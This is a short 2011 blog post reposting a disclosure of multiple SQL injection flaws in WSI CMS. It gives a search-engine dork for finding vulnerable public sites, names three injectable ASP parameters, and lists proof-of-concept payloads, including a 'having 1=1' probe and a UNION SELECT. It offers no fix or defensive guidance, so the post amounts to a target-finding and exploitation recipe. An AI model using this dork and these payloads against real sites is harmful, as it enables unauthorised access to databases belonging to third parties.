WSI CMS Multiple SQL Injections ~ Random stuff by yappare

Tuesday, March 1, 2011

WSI CMS Multiple SQL Injections

on March 01, 2011 No comments

Title : WSI CMS Multiple SQL Injections
Web : http://www.wsicorporate.com/
Found by: p0pc0rn 01/03/2011
Dork : intext:"Powered by WSI" filetype:asp

SQL
---

http://site.com/xxx.asp?PId=[SQL]
http://site.com/xxx.asp?Id=[SQL]
http://site.com/form.asp?formname=[name][SQL]

POC
---

http://site.com/xxx.asp?PId=1234 having 1=1
http://site.com/xxx.asp?Id=4321 having 1=1
http://site.com/form.asp?formname=test' union select 1,2 from test.aa

thanks,
-p0pc0rn-

Random stuff by yappare

Tuesday, March 1, 2011

WSI CMS Multiple SQL Injections

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories